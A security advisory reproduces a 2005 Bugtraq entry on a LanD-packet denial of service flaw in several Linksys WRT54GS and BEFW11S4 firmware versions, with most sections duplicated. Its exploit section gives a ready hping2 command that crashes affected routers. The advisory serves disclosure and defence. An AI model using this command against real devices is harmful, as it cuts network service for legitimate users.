Multiple Linksys Routers LanD Packet Denial Of Service Vulnerability
BID:15861
Info
Multiple Linksys Routers LanD Packet Denial Of Service Vulnerability
| Bugtraq ID: | 15861 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2005 12:00AM |
| Updated: | Dec 14 2005 12:00AM |
| Credit: | Justin M. Wray <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
Linksys WRT54GS 4.70.6 (Firmware) Linksys WRT54GS 4.50.6 (Firmware) Linksys BEFW11S4 v4 Linksys BEFW11S4 v3 Linksys BEFW11S4 1.44 Linksys BEFW11S4 1.43.3 Linksys BEFW11S4 1.4.3 Linksys BEFW11S4 1.4.2 .7 |
| Not Vulnerable: | |
Discussion
Multiple Linksys Routers LanD Packet Denial Of Service Vulnerability
Multiple Linksys devices are prone to a denial of service vulnerability.
These devices are susceptible to a remote denial of service vulnerability when handling TCP 'LanD' packets.
This issue allows remote attackers to crash affected devices, or to temporarily block further network routing functionality. This will deny further network services to legitimate users.
Linksys BEFW11S4 and WRT54GS devices are reportedly affected by this issue. Due to code reuse among devices, other devices may also be affected.
Multiple Linksys devices are prone to a denial of service vulnerability.
These devices are susceptible to a remote denial of service vulnerability when handling TCP 'LanD' packets.
This issue allows remote attackers to crash affected devices, or to temporarily block further network routing functionality. This will deny further network services to legitimate users.
Linksys BEFW11S4 and WRT54GS devices are reportedly affected by this issue. Due to code reuse among devices, other devices may also be affected.
Exploit / POC
Multiple Linksys Routers LanD Packet Denial Of Service Vulnerability
No exploit is required.
The following Hping2 command is sufficient to crash affected devices. The IP addresses must both be configured on the targeted device:
hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1
No exploit is required.
The following Hping2 command is sufficient to crash affected devices. The IP addresses must both be configured on the targeted device:
hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1
Solution / Fix
Multiple Linksys Routers LanD Packet Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Multiple Linksys Routers LanD Packet Denial Of Service Vulnerability
References:
References:
- Cable/DSL Routers Product Page (Linksys)
- Linksys Homepage (Linksys)
- WRT54GS Product Page (Linksys)
- RLA ("Remote LanD Attack") (Synister Syntax
)